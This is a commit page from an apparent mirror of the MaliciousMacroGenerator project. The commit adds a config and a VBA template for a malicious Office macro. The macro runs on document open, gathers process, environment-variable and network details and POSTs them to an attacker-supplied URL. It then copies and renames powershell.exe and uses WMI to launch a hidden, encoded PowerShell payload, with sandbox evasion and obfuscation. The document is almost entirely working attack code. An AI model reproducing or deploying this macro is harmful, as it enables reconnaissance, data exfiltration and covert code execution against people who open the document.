infosecn1nja
/
MaliciousMacroGenerator
mirror of https://github.com/infosecn1nja/MaliciousMacroGenerator.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5 from blark/master 

New template and config
patch-1
Mr.Un1k0d3r 2017-08-11 15:31:48 -04:00 committed by GitHub
parent 0a0e60755e 1ece1062ae
commit 6fbcdbf7b3
2 changed files with 139 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
configs/recon-rename-wmi-cmd-evasion.json Executable file
View File

@ -0,0 +1,17 @@
{
"description": "Recon payload with powershell renaming, and PS command execution via WMI, including evasion",
"template": "templates/payloads/recon-rename-wmi-cmd-evasion.vba",
"varcount": 150,
"encodingoffset": 4,
"chunksize": 200,
"encodedvars":{
"URL":"FULL URL THAT LOGS POST REQUESTS",
"PROCESS_NAME":"outlook.exe",
"SRC": "C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe",
"DST": "FILENAME.EXE",
"TEMP": "TEMP"
},
"vars": [],
"evasion": ["encoder", "process"],
"payload": " -nop -w hidden -encodedcommand ..."
}

122
templates/payloads/recon-rename-wmi-cmd-evasion.vba Executable file
View File

@ -0,0 +1,122 @@
[use:payload_wrapper]
[use:exec]
[use:init_wmi]
[use:init_properties]
[use:env_query]
[use:process_list]
[use:env_list]
[use:network_list]
Sub AutoOpen()
env_query
Dim var1 As String
Dim var2 As Object
Dim var3 As Integer
Dim var4 As String
Dim var5 As String
Dim var6 As String
var6 = Environ(decode("[TEMP]")) & "\" & decode("[DST]")
FileCopy decode("[SRC]"), var6
var3 = [int1]
var1 = func_evasion_process()
If (var1 = "bool1") Then
var5 = init_wmi("data1")
Set var2 = GetObject(var5)
var4 = payload_wrapper("data1", var6)
var4 = exec(var2, var4, var3)
End If
End Sub
Function payload_wrapper(payload_wrapper1 As String, payload_wrapper3 As String) As String
Dim payload_wrapper2 As String
[payload]
payload_wrapper2 = [payload_args]
payload_wrapper2 = decode(payload_wrapper2)
payload_wrapper = payload_wrapper3 & payload_wrapper2
End Function
Function init_properties() As String
Dim init_properties1 As String
init_properties1 = decode("{[winmgmts:root/cimv2]}")
init_properties = init_properties1
End Function
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
Dim exec4 As String
Dim exec5 As Integer
Dim exec13 As Integer
Dim exec14 As Integer
exec5 = [smallint1]
exec4 = exec2
If (exec3 > exec5) Then
Set exec10 = GetObject(init_properties())
Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
Set exec12 = exec11.SpawnInstance_
exec5 = exec3 - exec3
exec5 = exec5 + 12
exec12.ShowWindow = exec5
exec14 = exec1.Create(exec4, null, exec12, exec13)
End If
exec4 = "exec6"
exec = exec4
End Function
Function init_wmi(init_wmi1 As String) As String
Dim init_wmi2 As String
init_wmi2 = decode("{[winmgmts:Win32_Process]}")
init_wmi = init_wmi2
End Function
Function env_query() As String
Dim env_query1 As String
Set env_query2 = CreateObject(decode("{[MSXML2.ServerXMLHTTP]}"))
env_query1 = process_list()
env_query1 = env_query1 & Chr(10) & env_list()
env_query1 = env_query1 & Chr(10) & network_list()
decode(env_query1)
URL = decode("[URL]")
env_query2.Open "POST", URL, False
env_query2.send(env_query1)
End Function
Function process_list() As String
On Error Resume Next
Dim process_list1 As Object
Dim process_list2 As Object
Dim process_list4 As String
Set process_list1 = GetObject(decode("{[winmgmts:\\.\root\cimv2]}"))
Set process_list2 = process_list1.ExecQuery(decode("{[SELECT Name FROM Win32_Process]}"))
For Each process_list3 In process_list2
process_list4 = process_list4 & "," & process_list3.Name
Next
process_list = process_list4
End Function
Function env_list() As String
On Error Resume Next
Dim env_list1 As Object
Dim env_list2 As Object
Dim env_list4 As String
Set env_list1 = GetObject(decode("{[winmgmts:\\.\root\cimv2]}"))
Set env_list2 = env_list1.ExecQuery(decode("{[SELECT Name, VariableValue FROM Win32_Environment]}"))
For Each env_list3 In env_list2
env_list4 = env_list4 & "," & env_list3.Name & "=" & env_list3.VariableValue
Next
env_list = env_list4
End Function
Function network_list() As String
On Error Resume Next
Dim network_list1 As Object
Dim network_list2 As Object
Dim network_list4 As String
Set network_list1 = GetObject(decode("{[winmgmts:\\.\root\cimv2]}"))
Set network_list2 = network_list1.ExecQuery(decode("{[SELECT IPAddress, Description FROM Win32_NetworkAdapterConfiguration]}"))
For Each network_list3 In network_list2
network_list4 = network_list4 & "," & network_list3.IPAddress & "=" & network_list3.Description
Next
network_list = network_list4
End Function